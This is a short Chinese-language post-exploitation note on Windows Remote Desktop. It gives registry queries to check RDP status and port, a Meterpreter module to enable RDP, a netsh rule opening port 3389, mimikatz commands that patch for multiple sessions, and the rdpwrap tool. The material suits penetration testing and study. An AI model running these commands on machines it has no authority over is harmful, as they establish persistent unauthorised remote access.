后渗透-Windows远程桌面

查看是否开启远程桌面

0x1表示关闭；0x0表示开启

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

image.png

查看远程桌面的端口号

得到的结果为16进制格式

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

image.png

开启/关闭远程桌面

• 开启

meterpreter > run post/windows/manage/enable_rdp 

image.png

• 关闭

meterpreter > run multi_console_command -r /root/.msf4/loot/20191203031341_default_192.168.80.132_host.windows.cle_476697.txt

image.png

修改防火墙允许3389端口通过

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

image.png

开启多用户登录

1.mimikatz支持安装补丁实现多用户登录，但是重启后会失效

• 使用与原系统相同的账户，原系统还是会被切换到登录界面
• 使用与原系统不同的账户，可成功登录

privilege::debug
ts::multirdp

image.png

2.安装rdpwrap实现多用户登录
地址：https://github.com/stascorp/rdpwrap

install.bat 安装
uninstall.bat 卸载

image.png

参考：

https://laucyun.com/17f97e47b62717fb9b36750723aa861d.html